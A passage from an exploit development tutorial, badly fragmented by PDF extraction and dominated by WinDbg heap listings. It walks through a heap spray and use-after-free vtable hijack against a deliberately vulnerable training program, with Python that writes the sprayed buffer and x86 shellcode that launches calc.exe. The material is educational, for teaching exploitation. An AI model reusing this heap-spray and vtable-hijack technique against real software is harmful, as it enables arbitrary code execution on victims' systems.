-
 0ae30000 (size 00000000)
 
Virtual block: 0af30000 
-
 0af30000 (size 00000000)
 
Virtual block: 0b030000 
-
 0b030000 (size 00000000)
 
Virtual block: 0b130000 
-
 0b130000 (size 00000000)
 
Virtual block: 0b230000 
-
 0b2
30000 (size 00000000)
 
Virtual block: 0b330000 
-
 0b330000 (size 00000000)
 
Virtual block: 0b430000 
-
 0b430000 (size 00000000)
 
Virtual block: 0b530000 
-
 0b530000 (size 00000000)
 
Virtual block: 0b630000 
-
 0b630000 (size 00000000)
 
Virtual block: 0b730000 
-
 0b73
0000 (size 00000000)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 210 
-
 
Virtual block: 0b830000 
-
 0b830000 (size 00000000)
 
Virtual block: 0b930000 
-
 0b930000 (size 00000000)
 
Virtual block: 0ba30000 
-
 0ba30000 (size 00000000)
 
Virtual block: 0bb30000 
-
 0bb30000 (size 00000000)
 
Virtual block: 0bc30000 
-
 0bc30
000 (size 00000000)
 
Virtual block: 0bd30000 
-
 0bd30000 (size 00000000)
 
Virtual block: 0be30000 
-
 0be30000 (size 00000000)
 
Virtual block: 0bf30000 
-
 0bf30000 (size 00000000)
 
Virtual block: 0c030000 
-
 0c030000 (size 00000000)
 
Virtual block: 0c130000 
-
 0c1300
00 (size 00000000)
 
Virtual block: 0c230000 
-
 0c230000 (size 00000000)
 
Virtual block: 0c330000 
-
 0c330000 (size 00000000)
 
Virtual block: 0c430000 
-
 0c430000 (size 00000000)
 
Virtual block: 0c530000 
-
 0c530000 (size 00000000)
 
Virtual block: 0c630000 
-
 0c63000
0 (size 00000000)
 
Virtual block: 0c730000 
-
 0c730000 (size 00000000)
 
Virtual block: 0c830000 
-
 0c830000 (size 00000000)
 
Virtual block: 0c930000 
-
 0c930000 (size 00000000)
 
Virtual block: 0ca30000 
-
 0ca30000 (size 00000000)
 
Virtual block: 0cb30000 
-
 0cb30000
 (size 00000000)
 
Virtual block: 0cc30000 
-
 0cc30000 (size 00000000)
 
Virtual block: 0cd30000 
-
 0cd30000 (size 00000000)
 
Virtual block: 0ce30000 
-
 0ce30000 (size 00000000)
 
Virtual block: 0cf30000 
-
 0cf30000 (size 00000000)
 
Virtual block: 0d030000 
-
 0d030000 
(size 00000000)
 
Virtual block: 0d130000 
-
 0d130000 (size 00000000)
 
Virtual block: 0d230000 
-
 0d230000 (size 00000000)
 
Virtual block: 0d330000 
-
 0d330000 (size 00000000)
 
Virtual block: 0d430000 
-
 0d430000 (size 00000000)
 
Virtual block: 0d530000 
-
 0d530000 (
size 00000000)
 
Virtual block: 0d630000 
-
 0d630000 (size 00000000)
 
Virtual block: 0d730000 
-
 0d730000 (size 00000000)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 211 
-
 
Virtual block: 0d830000 
-
 0d830000 (size 00000000)
 
Virtual block: 0d930000 
-
 0d930000 (size 00000000)
 
Virtual block: 0da30000 
-
 0da30000 (s
ize 00000000)
 
Virtual block: 0db30000 
-
 0db30000 (size 00000000)
 
Virtual block: 0dc30000 
-
 0dc30000 (size 00000000)
 
Virtual block: 0dd30000 
-
 0dd30000 (size 00000000)
 
Virtual block: 0de30000 
-
 0de30000 (size 00000000)
 
Virtual block: 0df30000 
-
 0df30000 (si
ze 00000000)
 
Virtual block: 0e030000 
-
 0e030000 (size 00000000)
 
Virtual block: 0e130000 
-
 0e130000 (size 00000000)
 
Virtual block: 0e230000 
-
 0e230000 (size 00000000)
 
Virtual block: 0e330000 
-
 0e330000 (size 00000000)
 
Virtual block: 0e430000 
-
 0e430000 (siz
e 00000000)
 
Virtual block: 0e530000 
-
 0e530000 (size 00000000)
 
Virtual block: 0e630000 
-
 0e630000 (size 00000000)
 
Virtual block: 0e730000 
-
 0e730000 (size 00000000)
 
Virtual block: 0e830000 
-
 0e830000 (size 00000000)
 
Virtual block: 0e930000 
-
 0e930000 (size
 00000000)
 
Virtual block: 0ea30000 
-
 0ea30000 (size 00000000)
 
006b0000 40000062    1024    188   1024     93     9     1  201      0      
 
003b0000 40001062      64     12     64      2     2     1    0      0      
 
00ad0000 40001062    1088    160   1088 
    68     5     2    0      0      
 
002d0000 40001062     256      4    256      2     1     1    0      0      
 
-----------------------------------------------------------------------------
 
Perfect! Now the size of the junk data is just 
0x30
 bytes. You c
an verify that 
0x30
 is the minimum. If you try 
with 
0x2f
, it won’t work.
 
Let’s restart 
exploitme5.exe
 and redo it again. This time WinDbg prints the following:
 
0:001> !heap 
-
s
 
NtGlobalFlag enables following debugging aids for new heaps:
 
    tail checking
 
 
   free checking
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 212 
-
 
    validate parameters
 
LFH Key                   : 0x38c66846
 
Termination on corruption : ENABLED
 
  Heap     Flags   Reserv  Commit  Virt   Free  List   UCR  Virt  Lock  Fast
 
                    (k)     (k)    (k)     (k) length      bloc
ks cont. heap
 
-----------------------------------------------------------------------------
 
Virtual block: 02070000 
-
 02070000 (size 00000000)
 
Virtual block: 02270000 
-
 02270000 (size 00000000)
 
Virtual block: 02370000 
-
 02370000 (size 00000000)
 
Virtual blo
ck: 02470000 
-
 02470000 (size 00000000)
 
Virtual block: 02570000 
-
 02570000 (size 00000000)
 
Virtual block: 02670000 
-
 02670000 (size 00000000)
 
Virtual block: 02770000 
-
 02770000 (size 00000000)
 
Virtual block: 02870000 
-
 02870000 (size 00000000)
 
Virtual bloc
k: 02970000 
-
 02970000 (size 00000000)
 
Virtual block: 02a70000 
-
 02a70000 (size 00000000)
 
Virtual block: 02b70000 
-
 02b70000 (size 00000000)
 
Virtual block: 02c70000 
-
 02c70000 (size 00000000)
 
Virtual block: 02d70000 
-
 02d70000 (size 00000000)
 
Virtual block
: 02e70000 
-
 02e70000 (size 00000000)
 
Virtual block: 02f70000 
-
 02f70000 (size 00000000)
 
Virtual block: 03070000 
-
 03070000 (size 00000000)
 
Virtual block: 03170000 
-
 03170000 (size 00000000)
 
Virtual block: 03270000 
-
 03270000 (size 00000000)
 
Virtual block:
 03370000 
-
 03370000 (size 00000000)
 
Virtual block: 03470000 
-
 03470000 (size 00000000)
 
Virtual block: 03570000 
-
 03570000 (size 00000000)
 
Virtual block: 03670000 
-
 03670000 (size 00000000)
 
Virtual block: 03770000 
-
 03770000 (size 00000000)
 
Virtual block: 
03870000 
-
 03870000 (size 00000000)
 
Virtual block: 03970000 
-
 03970000 (size 00000000)
 
Virtual block: 03a70000 
-
 03a70000 (size 00000000)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 213 
-
 
Virtual block: 03b70000 
-
 03b70000 (size 00000000)
 
Virtual block: 03c70000 
-
 03c70000 (size 00000000)
 
Virtual block: 0
3d70000 
-
 03d70000 (size 00000000)
 
Virtual block: 03e70000 
-
 03e70000 (size 00000000)
 
Virtual block: 03f70000 
-
 03f70000 (size 00000000)
 
Virtual block: 04070000 
-
 04070000 (size 00000000)
 
Virtual block: 04170000 
-
 04170000 (size 00000000)
 
Virtual block: 04
270000 
-
 04270000 (size 00000000)
 
Virtual block: 04370000 
-
 04370000 (size 00000000)
 
Virtual block: 04470000 
-
 04470000 (size 00000000)
 
Virtual block: 04570000 
-
 04570000 (size 00000000)
 
Virtual block: 04670000 
-
 04670000 (size 00000000)
 
Virtual block: 047
70000 
-
 04770000 (size 00000000)
 
Virtual block: 04870000 
-
 04870000 (size 00000000)
 
Virtual block: 04970000 
-
 04970000 (size 00000000)
 
Virtual block: 04a70000 
-
 04a70000 (size 00000000)
 
Virtual block: 04b70000 
-
 04b70000 (size 00000000)
 
Virtual block: 04c7
0000 
-
 04c70000 (size 00000000)
 
Virtual block: 04d70000 
-
 04d70000 (size 00000000)
 
Virtual block: 04e70000 
-
 04e70000 (size 00000000)
 
Virtual block: 04f70000 
-
 04f70000 (size 00000000)
 
Virtual block: 05070000 
-
 05070000 (size 00000000)
 
Virtual block: 05170
000 
-
 05170000 (size 00000000)
 
Virtual block: 05270000 
-
 05270000 (size 00000000)
 
Virtual block: 05370000 
-
 05370000 (size 00000000)
 
Virtual block: 05470000 
-
 05470000 (size 00000000)
 
Virtual block: 05570000 
-
 05570000 (size 00000000)
 
Virtual block: 056700
00 
-
 05670000 (size 00000000)
 
Virtual block: 05770000 
-
 05770000 (size 00000000)
 
Virtual block: 05870000 
-
 05870000 (size 00000000)
 
Virtual block: 05970000 
-
 05970000 (size 00000000)
 
Virtual block: 05a70000 
-
 05a70000 (size 00000000)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 214 
-
 
Virtual block: 05b7000
0 
-
 05b70000 (size 00000000)
 
Virtual block: 05c70000 
-
 05c70000 (size 00000000)
 
Virtual block: 05d70000 
-
 05d70000 (size 00000000)
 
Virtual block: 05e70000 
-
 05e70000 (size 00000000)
 
Virtual block: 05f70000 
-
 05f70000 (size 00000000)
 
Virtual block: 06070000
 
-
 06070000 (size 00000000)
 
Virtual block: 06170000 
-
 06170000 (size 00000000)
 
Virtual block: 06270000 
-
 06270000 (size 00000000)
 
Virtual block: 06370000 
-
 06370000 (size 00000000)
 
Virtual block: 06470000 
-
 06470000 (size 00000000)
 
Virtual block: 06570000 
-
 06570000 (size 00000000)
 
Virtual block: 06670000 
-
 06670000 (size 00000000)
 
Virtual block: 06770000 
-
 06770000 (size 00000000)
 
Virtual block: 06870000 
-
 06870000 (size 00000000)
 
Virtual block: 06970000 
-
 06970000 (size 00000000)
 
Virtual block: 06a70000 
-
 06a70000 (size 00000000)
 
Virtual block: 06b70000 
-
 06b70000 (size 00000000)
 
Virtual block: 06c70000 
-
 06c70000 (size 00000000)
 
Virtual block: 06d70000 
-
 06d70000 (size 00000000)
 
Virtual block: 06e70000 
-
 06e70000 (size 00000000)
 
Virtual block: 06f70000 
-
 
06f70000 (size 00000000)
 
Virtual block: 07070000 
-
 07070000 (size 00000000)
 
Virtual block: 07170000 
-
 07170000 (size 00000000)
 
Virtual block: 07270000 
-
 07270000 (size 00000000)
 
Virtual block: 07370000 
-
 07370000 (size 00000000)
 
Virtual block: 07470000 
-
 0
7470000 (size 00000000)
 
Virtual block: 07570000 
-
 07570000 (size 00000000)
 
Virtual block: 07670000 
-
 07670000 (size 00000000)
 
Virtual block: 07770000 
-
 07770000 (size 00000000)
 
Virtual block: 07870000 
-
 07870000 (size 00000000)
 
Virtual block: 07970000 
-
 07
970000 (size 00000000)
 
Virtual block: 07a70000 
-
 07a70000 (size 00000000)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 215 
-
 
Virtual block: 07b70000 
-
 07b70000 (size 00000000)
 
Virtual block: 07c70000 
-
 07c70000 (size 00000000)
 
Virtual block: 07d70000 
-
 07d70000 (size 00000000)
 
Virtual block: 07e70000 
-
 07e
70000 (size 00000000)
 
Virtual block: 07f70000 
-
 07f70000 (size 00000000)
 
Virtual block: 08070000 
-
 08070000 (size 00000000)
 
Virtual block: 08170000 
-
 08170000 (size 00000000)
 
Virtual block: 08270000 
-
 08270000 (size 00000000)
 
Virtual block: 08370000 
-
 0837
0000 (size 00000000)
 
Virtual block: 08470000 
-
 08470000 (size 00000000)
 
Virtual block: 08570000 
-
 08570000 (size 00000000)
 
Virtual block: 08670000 
-
 08670000 (size 00000000)
 
Virtual block: 08770000 
-
 08770000 (size 00000000)
 
Virtual block: 08870000 
-
 08870
000 (size 00000000)
 
Virtual block: 08970000 
-
 08970000 (size 00000000)
 
Virtual block: 08a70000 
-
 08a70000 (size 00000000)
 
Virtual block: 08b70000 
-
 08b70000 (size 00000000)
 
Virtual block: 08c70000 
-
 08c70000 (size 00000000)
 
Virtual block: 08d70000 
-
 08d700
00 (size 00000000)
 
Virtual block: 08e70000 
-
 08e70000 (size 00000000)
 
Virtual block: 08f70000 
-
 08f70000 (size 00000000)
 
Virtual block: 09070000 
-
 09070000 (size 00000000)
 
Virtual block: 09170000 
-
 09170000 (size 00000000)
 
Virtual block: 09270000 
-
 0927000
0 (size 00000000)
 
Virtual block: 09370000 
-
 09370000 (size 00000000)
 
Virtual block: 09470000 
-
 09470000 (size 00000000)
 
Virtual block: 09570000 
-
 09570000 (size 00000000)
 
Virtual block: 09670000 
-
 09670000 (size 00000000)
 
Virtual block: 09770000 
-
 09770000
 (size 00000000)
 
Virtual block: 09870000 
-
 09870000 (size 00000000)
 
Virtual block: 09970000 
-
 09970000 (size 00000000)
 
Virtual block: 09a70000 
-
 09a70000 (size 00000000)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 216 
-
 
Virtual block: 09b70000 
-
 09b70000 (size 00000000)
 
Virtual block: 09c70000 
-
 09c70000 
(size 00000000)
 
Virtual block: 09d70000 
-
 09d70000 (size 00000000)
 
Virtual block: 09e70000 
-
 09e70000 (size 00000000)
 
Virtual block: 09f70000 
-
 09f70000 (size 00000000)
 
Virtual block: 0a070000 
-
 0a070000 (size 00000000)
 
Virtual block: 0a170000 
-
 0a170000 (
size 00000000)
 
Virtual block: 0a270000 
-
 0a270000 (size 00000000)
 
Virtual block: 0a370000 
-
 0a370000 (size 00000000)
 
Virtual block: 0a470000 
-
 0a470000 (size 00000000)
 
Virtual block: 0a570000 
-
 0a570000 (size 00000000)
 
Virtual block: 0a670000 
-
 0a670000 (s
ize 00000000)
 
Virtual block: 0a770000 
-
 0a770000 (size 00000000)
 
Virtual block: 0a870000 
-
 0a870000 (size 00000000)
 
Virtual block: 0a970000 
-
 0a970000 (size 00000000)
 
Virtual block: 0aa70000 
-
 0aa70000 (size 00000000)
 
Virtual block: 0ab70000 
-
 0ab70000 (si
ze 00000000)
 
Virtual block: 0ac70000 
-
 0ac70000 (size 00000000)
 
Virtual block: 0ad70000 
-
 0ad70000 (size 00000000)
 
Virtual block: 0ae70000 
-
 0ae70000 (size 00000000)
 
Virtual block: 0af70000 
-
 0af70000 (size 00000000)
 
Virtual block: 0b070000 
-
 0b070000 (siz
e 00000000)
 
Virtual block: 0b170000 
-
 0b170000 (size 00000000)
 
Virtual block: 0b270000 
-
 0b270000 (size 00000000)
 
Virtual block: 0b370000 
-
 0b370000 (size 00000000)
 
Virtual block: 0b470000 
-
 0b470000 (size 00000000)
 
Virtual block: 0b570000 
-
 0b570000 (size
 00000000)
 
Virtual block: 0b670000 
-
 0b670000 (size 00000000)
 
Virtual block: 0b770000 
-
 0b770000 (size 00000000)
 
Virtual block: 0b870000 
-
 0b870000 (size 00000000)
 
Virtual block: 0b970000 
-
 0b970000 (size 00000000)
 
Virtual block: 0ba70000 
-
 0ba70000 (size 
00000000)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 217 
-
 
Virtual block: 0bb70000 
-
 0bb70000 (size 00000000)
 
Virtual block: 0bc70000 
-
 0bc70000 (size 00000000)
 
Virtual block: 0bd70000 
-
 0bd70000 (size 00000000)
 
Virtual block: 0be70000 
-
 0be70000 (size 00000000)
 
Virtual block: 0bf70000 
-
 0bf70000 (size 0
0000000)
 
Virtual block: 0c070000 
-
 0c070000 (size 00000000)
 
Virtual block: 0c170000 
-
 0c170000 (size 00000000)
 
Virtual block: 0c270000 
-
 0c270000 (size 00000000)
 
Virtual block: 0c370000 
-
 0c370000 (size 00000000)
 
Virtual block: 0c470000 
-
 0c470000 (size 00
000000)
 
Virtual block: 0c570000 
-
 0c570000 (size 00000000)
 
Virtual block: 0c670000 
-
 0c670000 (size 00000000)
 
Virtual block: 0c770000 
-
 0c770000 (size 00000000)
 
Virtual block: 0c870000 
-
 0c870000 (size 00000000)
 
Virtual block: 0c970000 
-
 0c970000 (size 000
00000)
 
Virtual block: 0ca70000 
-
 0ca70000 (size 00000000)
 
Virtual block: 0cb70000 
-
 0cb70000 (size 00000000)
 
Virtual block: 0cc70000 
-
 0cc70000 (size 00000000)
 
Virtual block: 0cd70000 
-
 0cd70000 (size 00000000)
 
Virtual block: 0ce70000 
-
 0ce70000 (size 0000
0000)
 
Virtual block: 0cf70000 
-
 0cf70000 (size 00000000)
 
Virtual block: 0d070000 
-
 0d070000 (size 00000000)
 
Virtual block: 0d170000 
-
 0d170000 (size 00000000)
 
Virtual block: 0d270000 
-
 0d270000 (size 00000000)
 
Virtual block: 0d370000 
-
 0d370000 (size 00000
000)
 
Virtual block: 0d470000 
-
 0d470000 (size 00000000)
 
Virtual block: 0d570000 
-
 0d570000 (size 00000000)
 
Virtual block: 0d670000 
-
 0d670000 (size 00000000)
 
Virtual block: 0d770000 
-
 0d770000 (size 00000000)
 
Virtual block: 0d870000 
-
 0d870000 (size 000000
00)
 
Virtual block: 0d970000 
-
 0d970000 (size 00000000)
 
Virtual block: 0da70000 
-
 0da70000 (size 00000000)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 218 
-
 
Virtual block: 0db70000 
-
 0db70000 (size 00000000)
 
Virtual block: 0dc70000 
-
 0dc70000 (size 00000000)
 
Virtual block: 0dd70000 
-
 0dd70000 (size 0000000
0)
 
Virtual block: 0de70000 
-
 0de70000 (size 00000000)
 
Virtual block: 0df70000 
-
 0df70000 (size 00000000)
 
Virtual block: 0e070000 
-
 0e070000 (size 00000000)
 
Virtual block: 0e170000 
-
 0e170000 (size 00000000)
 
Virtual block: 0e270000 
-
 0e270000 (size 00000000
)
 
Virtual block: 0e370000 
-
 0e370000 (size 00000000)
 
Virtual block: 0e470000 
-
 0e470000 (size 00000000)
 
Virtual block: 0e570000 
-
 0e570000 (size 00000000)
 
Virtual block: 0e670000 
-
 0e670000 (size 00000000)
 
Virtual block: 0e770000 
-
 0e770000 (size 00000000)
 
Virtual block: 0e870000 
-
 0e870000 (size 00000000)
 
Virtual block: 0e970000 
-
 0e970000 (size 00000000)
 
002d0000 40000062    1024    188   1024     93     9     1  201      0      
 
00190000 40001062      64     12     64      2     2     1    0      0      
 
01d50000 40001062    1088    160   1088     68     5     2    0      0      
 
01d00000 40001062     256      4    256      2     1     1    0      0      
 
-----------------------------------------------------------------------------
 
This time the addresses
 are different. Let’s compare the last four:
 
Virtual block: 0e730000 
-
 0e730000 (size 00000000)
 
Virtual block: 0e830000 
-
 0e830000 (size 00000000)
 
Virtual block: 0e930000 
-
 0e930000 (size 00000000)
 
Virtual block: 0ea30000 
-
 0ea30000 (size 00000000)
 
-------
-------
 
Virtual block: 0e670000 
-
 0e670000 (size 00000000)
 
Virtual block: 0e770000 
-
 0e770000 (size 00000000)
 
Virtual block: 0e870000 
-
 0e870000 (size 00000000)
 
Virtual block: 0e970000 
-
 0e970000 (size 00000000)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 219 
-
 
What we note, though, is that they are alway
s aligned on 
0x10000
 boundaries. Now remember that we must 
add 
0x20
 to those addresses because of the header:
 
block 197: address = 0x0e670020; size = 1048528
 
block 198: address = 0x0e770020; size = 1048528
 
block 199: address = 0x0e870020; size = 1048528
 
bl
ock 200: address = 0x0e970020; size = 1048528
 
If we pad our payload so that its size is 0x10000 and we repeat it throughout our entire block of 
1 MB
 (
-
0x30
 
bytes), then we will certainly find our payload at, for example, the address 
0x0a000020
. We chose th
e 
address 
0x0a000020
 because it’s in the middle of our heap spray so, even if the addresses vary a little bit, it 
will certainly contain our payload.
 
Let’s try to do just that:
 
Python
 
 
with
 
open
(
r'd:
\
buf.dat'
,
 
'wb'
)
 
as
 
f
:
 
    
payload
 
=
 
'a'
*
0x8000
 
+
 
'b'
*
0x8
000
      
# 0x8000 + 0x8000 = 0x10000
 
    
block_size
 
=
 
0x100000
-
0x30
 
    
block
 
=
 
payload
*(
block_size
/
len
(
payload
))
 
+
 
payload
[:
block_size
 
%
 
len
(
payload
)]
 
    
f
.
write
(
block
)
 
 
Note that since the size of our block is 
0x30
 bytes shorter than 
1 MB
, the last copy
 of our payload needs to 
be truncated. This is not a problem, of course.
 
Now let’s restart 
exploitme5.exe
 in WinDbg, run it, read the block from file, make 
200
 copies of it, break the 
execution, and, finally, inspect the memory at 
0x0a000020
:
 
09ffffd0  62 
62 62 62 62 62 62 62
-
62 62 62 62 62 62 62 62  bbbbbbbbbbbbbbbb
 
09ffffe0  62 62 62 62 62 62 62 62
-
62 62 62 62 62 62 62 62  bbbbbbbbbbbbbbbb
 
09fffff0  62 62 62 62 62 62 62 62
-
62 62 62 62 62 62 62 62  bbbbbbbbbbbbbbbb
 
0a000000  62 62 62 62 62 62 62 62
-
62 62 6
2 62 62 62 62 62  bbbbbbbbbbbbbbbb
 
0a000010  62 62 62 62 62 62 62 62
-
62 62 62 62 62 62 62 62  bbbbbbbbbbbbbbbb
 
0a000020  61 61 61 61 61 61 61 61
-
61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa   <================ start
 
0a000030  61 61 61 61 61 61 61 61
-
61 61 61 
61 61 61 61 61  aaaaaaaaaaaaaaaa
 
0a000040  61 61 61 61 61 61 61 61
-
61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
 
0a000050  61 61 61 61 61 61 61 61
-
61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
 
0a000060  61 61 61 61 61 61 61 61
-
61 61 61 61 61 61 61 61  aaaaaaaaaaaa
aaaa
 
As we can see, a copy of our payload starts exactly at 
0xa000020
, just as we expected. Now we must put it 
all together and finally exploit 
exploitme5.exe
.
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 220 
-
 
The actual exploitation
 
We saw that there is a UAF bug in 
configureMutator()
. We can use this fu
nction to create a dangling pointer, 
mutators[0]
. By reading a block of 
168
 bytes (the size of 
Multiplier
) from file, we can make the dangling 
pointer point to data we control. In particular, the first DWORD of this data will contain the value 
0x0a000020
, 
which is the address where we’ll put the VFTable for taking control of the execution flow.
 
Let’s have a look at 
mutateBlock()
:
 
C++
 
 
void
 
mutateBlock
()
 
{
 
    
listBlocks
();
 
    
while
 
(
true
)
 
{
 
        
printf
(
"Index of block to mutate (
-
1 to exit): "
);
 
       
int
 
index
;
 
        
scanf_s
(
"%d"
,
 
&
index
);
 
        
fflush
(
stdin
);
 
        
if
 
(
index
 
==
 
-
1
)
 
            
break
;
 
        
if
 
(
index
 
<
 
0
 
||
 
index
 
>=
 
(
int
)
blocks
.
size
())
 
{
 
            
printf
(
"Wrong index!
\
n"
);
 
        
}
 
        
else
 
{
 
            
while
 
(
true
)
 
{
 
                
printf
(
 
                    
"1) Multiplier
\
n"
 
                    
"2) LowerCaser
\
n"
 
                    
"3) Exit
\
n"
 
                    
"Your choice [1
-
3]: "
);
 
                
int
 
choice
 
=
 
_getch
();
 
                
printf
(
"
\
n
\
n"
);
 
         
if
 
(
choice
 
==
 
'3'
)
 
                    
break
;
 
                
if
 
(
choice
 
>=
 
'1'
 
&&
 
choice
 
<=
 
'3'
)
 
{
 
                    
choice
 
-
=
 
'0'
;
 
                    
mutators
[
choice
 
-
 
1
]
-
>
mutate
(
blocks
[
index
].
getData
(),
 
blocks
[
index
].
getSize
());
 
              
printf
(
"The block was mutated.
\
n
\
n"
);
 
                    
break
;
 
                
}
 
                
else
 
                    
printf
(
"Wrong choice!
\
n
\
n"
);
 
            
}
 
            
break
;
 
        
}
 
    
}
 
}
 
 
The interesting line is the following:
 
C++
 
 
m
utators
[
choice
 
-
 
1
]
-
>
mutate
(
blocks
[
index
].
getData
(),
 
blocks
[
index
].
getSize
());
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 221 
-
 
 
By choosing 
Multiplier
, choice will be 
1
, so that line will evaluate to
 
C++
 
 
mutators
[
0
]
-
>
mutate
(...);
 
 
The method 
mutate
 is the second virtual method in the VFTable of the 
Mul
tiplier
. Therefore, at the address 
0x0a000020
 we’ll put a VFTable with this form:
 
0x0a000020:    whatever
 
0x0a000024:   0x0a000028
 
When mutate is called, the execution will jump to the code at the address 
0x0a000028
, exactly where our 
shellcode will reside
.
 
We know that we can spray the heap so that our payload lands at the address 
0x0a000020
. Here’s the 
payload we’ll be using:
 
 
Here’
s the complete schema:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 222 
-
 
First let’s create 
d:
\
obj.dat
:
 
Python
 
 
import
 
struct
 
with
 
open
(
r'd:
\
obj.dat'
,
 
'wb'
)
 
as
 
f
:
 
    
vftable_ptr
 
=
 
struct
.
pack
(
'<I'
,
 
0x0a000020
)
 
    
f
.
write
(
vftable_ptr
 
+
 
'a'
*
164
)
 
 
Then let’s create 
d:
\
buf.dat
:
 
Python
 
 
import
 
struct
 
with
 
open
(
r'd:
\
buf.dat'
,
 
'wb'
)
 
as
 
f
:
 
    
shellcode
 
=
 
(
 
        
"
\
xe8
\
xff
\
xff
\
xff
\
xff
\
xc0
\
x5f
\
xb9
\
x11
\
x03
\
x02
\
x02
\
x81
\
xf1
\
x02
\
x02"
 
+
 
     
"
\
x02
\
x02
\
x83
\
xc7
\
x1d
\
x33
\
xf6
\
xfc
\
x8a
\
x07
\
x3c
\
x02
\
x0f
\
x44
\
xc6
\
xaa"
 
+
 
        
"
\
xe2
\
xf6
\
x55
\
x8b
\
xec
\
x83
\
xec
\
x0c
\
x56
\
x57
\
xb9
\
x7f
\
xc0
\
xb4
\
x7b
\
xe8"
 
+
 
        
"
\
x55
\
x02
\
x02
\
x02
\
xb9
\
xe0
\
x53
\
x31
\
x4b
\
x8b
\
xf8
\
xe8
\
x49
\
x02
\
x02
\
x02"
 
+
 
        
"
\
x8b
\
xf0
\
xc7
\
x45
\
xf4
\
x63
\
x61
\
x6c
\
x63
\
x6a
\
x05
\
x8d
\
x45
\
xf4
\
xc7
\
x45"
 
+
 
        
"
\
xf8
\
x2e
\
x65
\
x78
\
x65
\
x50
\
xc6
\
x45
\
xfc
\
x02
\
xff
\
xd7
\
x6a
\
x02
\
xff
\
xd6"
 
+
 
        
"
\
x5f
\
x33
\
xc0
\
x5e
\
x8b
\
xe5
\
x5d
\
xc3
\
x33
\
xd2
\
xeb
\
x10
\
xc1
\
xca
\
x0d
\
x3c"
 
+
 
        
"
\
x61
\
x0f
\
xbe
\
xc0
\
x7c
\
x03
\
x83
\
xe8
\
x20
\
x03
\
xd0
\
x
41
\
x8a
\
x01
\
x84
\
xc0"
 
+
 
        
"
\
x75
\
xea
\
x8b
\
xc2
\
xc3
\
x8d
\
x41
\
xf8
\
xc3
\
x55
\
x8b
\
xec
\
x83
\
xec
\
x14
\
x53"
 
+
 
        
"
\
x56
\
x57
\
x89
\
x4d
\
xf4
\
x64
\
xa1
\
x30
\
x02
\
x02
\
x02
\
x89
\
x45
\
xfc
\
x8b
\
x45"
 
+
 
        
"
\
xfc
\
x8b
\
x40
\
x0c
\
x8b
\
x40
\
x14
\
x8b
\
xf8
\
x89
\
x45
\
xec
\
x8b
\
xcf
\
xe8
\
xd2"
 
+
 
   
"
\
xff
\
xff
\
xff
\
x8b
\
x3f
\
x8b
\
x70
\
x18
\
x85
\
xf6
\
x74
\
x4f
\
x8b
\
x46
\
x3c
\
x8b"
 
+
 
        
"
\
x5c
\
x30
\
x78
\
x85
\
xdb
\
x74
\
x44
\
x8b
\
x4c
\
x33
\
x0c
\
x03
\
xce
\
xe8
\
x96
\
xff"
 
+
 
        
"
\
xff
\
xff
\
x8b
\
x4c
\
x33
\
x20
\
x89
\
x45
\
xf8
\
x03
\
xce
\
x33
\
xc0
\
x89
\
x4d
\
xf0"
 
+
 
        
"
\
x89
\
x45
\
xfc
\
x39
\
x4
4
\
x33
\
x18
\
x76
\
x22
\
x8b
\
x0c
\
x81
\
x03
\
xce
\
xe8
\
x75"
 
+
 
        
"
\
xff
\
xff
\
xff
\
x03
\
x45
\
xf8
\
x39
\
x45
\
xf4
\
x74
\
x1e
\
x8b
\
x45
\
xfc
\
x8b
\
x4d"
 
+
 
        
"
\
xf0
\
x40
\
x89
\
x45
\
xfc
\
x3b
\
x44
\
x33
\
x18
\
x72
\
xde
\
x3b
\
x7d
\
xec
\
x75
\
x9c"
 
+
 
        
"
\
x33
\
xc0
\
x5f
\
x5e
\
x5b
\
x8b
\
xe5
\
x5d
\
xc3
\
x8b
\
x4d
\
xfc
\
x8b
\
x44
\
x33
\
x24"
 
+
 
        
"
\
x8d
\
x04
\
x48
\
x0f
\
xb7
\
x0c
\
x30
\
x8b
\
x44
\
x33
\
x1c
\
x8d
\
x04
\
x88
\
x8b
\
x04"
 
+
 
        
"
\
x30
\
x03
\
xc6
\
xeb
\
xdd"
)
 
    
vftable
 
=
 
"aaaa"
 
+
 
struct
.
pack
(
'<I'
,
 
0x0a000028
)
        
# second virtual function
 
    
code
 
=
 
vftable
 
+
 
shellcode
 
+
 
'a'
*
(
0x10000
 
-
 
len
(
shellcode
)
 
-
 
len
(
vftable
))
 
    
block_size
 
=
 
0x100000
-
0x30
 
    
block
 
=
 
code
*(
block_size
/
len
(
code
))
 
+
 
code
[:
block_size
 
%
 
len
(
code
)]
 
    
f
.
write
(
block
)
 
 
Now we need to run 
exploitme5.exe
 (we don’t need WinDbg) and do the following:
 
1) Read bloc
k from file
 
2) List blocks
 
3) Duplicate Block
 
4) Configure mutator
 
5) Mutate block
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 223 
-
 
6) Exit
 
 
Your choice [1
-
6]: 1
 
 
File path ('exit' to exit): d:
\
obj.dat
 
 
Block read (168 bytes)
 
 
1) Read block from file
 
2) List blocks
 
